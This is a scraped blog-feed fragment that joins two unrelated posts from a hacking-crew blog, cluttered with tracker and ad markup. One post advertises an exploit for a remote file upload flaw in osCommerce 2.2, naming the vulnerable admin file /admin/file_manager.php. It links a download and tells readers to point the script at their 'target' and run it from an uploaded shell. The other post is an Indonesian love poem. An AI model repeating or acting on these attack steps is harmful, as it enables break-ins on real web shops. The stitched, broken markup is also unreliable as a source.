src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/SDfStmcR9zM" height="1" width="1"/>arianomhttp://www.blogger.com/profile/00390503237917172808noreply@blogger.comhttp://kill-nines.blogspot.com/2010/12/linux-kernel-2637-local-privilege_20.htmltag:blogger.com,1999:blog-5679666230684006712.post-15570961296320593162010-12-20T12:45:00.008+07:002011-01-03T21:19:09.918+07:002011-01-03T21:19:09.918+07:00<div style="text-align: center;"><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_t3RQMzRGaJs/TQ76gdyCVjI/AAAAAAAAAD0/-CUHRWSKv7s/s1600/oscommerce.jpg"><img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 421px; height: 239px;" src="http://4.bp.blogspot.com/_t3RQMzRGaJs/TQ76gdyCVjI/AAAAAAAAAD0/-CUHRWSKv7s/s320/oscommerce.jpg" alt="" id="BLOGGER_PHOTO_ID_5552650826251654706" border="0" /></a> <span style="color: rgb(255, 0, 0);">Recode by arianom</span><br /></div><br /><code class="plain plain"></code>[$] Exploit Title : Oscommerce Online Merchant v2.2 - Remote File Upload<br />[$] Date : 30-05-2010 <br />[$] Author : MasterGipy<br />[$] Email : mastergipy [at] gmail.com<br />[$] Bug : Remote File Upload<br />[$] Vendor : http://www.oscommerce.com<br />[$] Google Dork : n/a<br />[%] vulnerable file: /admin/file_manager.php<br />[$] Exploit: <code class="plain plain"></code><a style="font-weight: bold;" href="http://8edcd2a7.linkbucks.com">Download</a><br /><br /><code class="plain plain">Note:<br /></code>Open and edit script,<br />Change http://kill-9.org with your website target.<br /> Then upload to shell or hosting. Run it and Resolve to the Target.<br />Good Luck,,Bro<br /><br />Greats : All Kill-9 Crew and IndonesianCoder Team , Malang-Cyber Crew and You<br /><div class="line alt2"><table><tbody><tr><span><span></span></span></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><span><span></span></span></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="content"><br /></td></tr></tbody></table></div><code class="plain plain"></code><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-1557096129632059316?l=kill-nines.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/xpOuuMD4Qxz18173xI67jneKoec/0/da"><img src="http://feedads.g.doubleclick.net/~a/xpOuuMD4Qxz18173xI67jneKoec/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/xpOuuMD4Qxz18173xI67jneKoec/1/da"><img src="http://feedads.g.doubleclick.net/~a/xpOuuMD4Qxz18173xI67jneKoec/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/NaqwkoljR14" height="1" width="1"/>arianomhttp://www.blogger.com/profile/00390503237917172808noreply@blogger.comhttp://kill-nines.blogspot.com/2010/12/oscommerce-online-merchant-v22.htmltag:blogger.com,1999:blog-5679666230684006712.post-66707433585881726492010-12-20T00:04:00.002+07:002011-11-03T20:00:12.907+07:002011-11-03T20:00:12.907+07:00<div style="text-align: center;"><span style=";font-size:180%;color:blue;" ><i><b>Tutina Fitri </b></i></span><br /><i><b><span style=";font-size:4.5px;color:blue;" >malang, juli '03</span></b></i><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://arianom.net/"><img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 194px; height: 259px;" src="http://1.bp.blogspot.com/_t3RQMzRGaJs/TQ7-RUw_pfI/AAAAAAAAAD8/VFwz83q4jqc/s320/sadness.jpg" alt="" id="BLOGGER_PHOTO_ID_5552654964179838450" border="0" /></a><br /></div><center><a href="http://arianom.net/"><span style="color:blue;"><i>Dear...Kadang kita berharap<br />Tuhan akan menunjuk jalan kita<br />dan membuka sedikit tabir rahasianya.<br />Seperti matahari yang terbit di timur dan terbenam di barat<br />atau seperti waktu yang tidak pernah berhenti,<br />perasaanku akan selalu dekat denganmu<br />Sepi bicara,<br />betapa sempitnya waktu, betapa terasa besarnya cinta,<br />jikapun aku percaya ada hidup setelah mati, kita tidak akan pernah bertemu lagi.<br />Dear...Kita selalu mencoba untuk menghargai hidup agar lebih berarti,<br />meskipun kecil tapi embun adalah pertanda datangnya musim semi.<br />Suara burung atau bunyi yang indah adalah bukan pilihan,<br />keduanya akan selalu ingin kita nikmati.<br />Jika aku harus memilih aku tidak akan memilih<br />karna angin akan selalu membawa legenda cerita kita<br />yang akan selalu berakhir bahagia.<br />Hanya waktu yang bisa merenggutmu dariku..</i></span></a><br /><br /><div style="text-align: right; font-style: italic;"><span style="font-size:85%;"><span style="color: rgb(51, 0, 153);">sumbersari gang 5/503</span><br /></span></div><center> <span style="color:blue;"> </span></center></center><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-6670743358588172649?l=kill-nines.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/eQ_pwpzFYY_hWZdW1_iFgTqQaHs/0/da"><img src="http://feedads.g.doubleclick.net/~a/eQ_pwpzFYY_hWZdW1_iFgTqQaHs/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/eQ_pwpzFYY_hWZdW1_iFgTqQaHs/1/da"><img src="http://feedads.g.doubleclick.net/~a/eQ_pwpzFYY_hWZdW1_iFgTqQaHs/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/9cxfXpluUak" height="1" width="1"/>arianomhttp://www.blogger.com/profile/00390503237917172808noreply@blogger.comhttp://kill-nines.blogspot.com/2010/12/just-in-memorian.html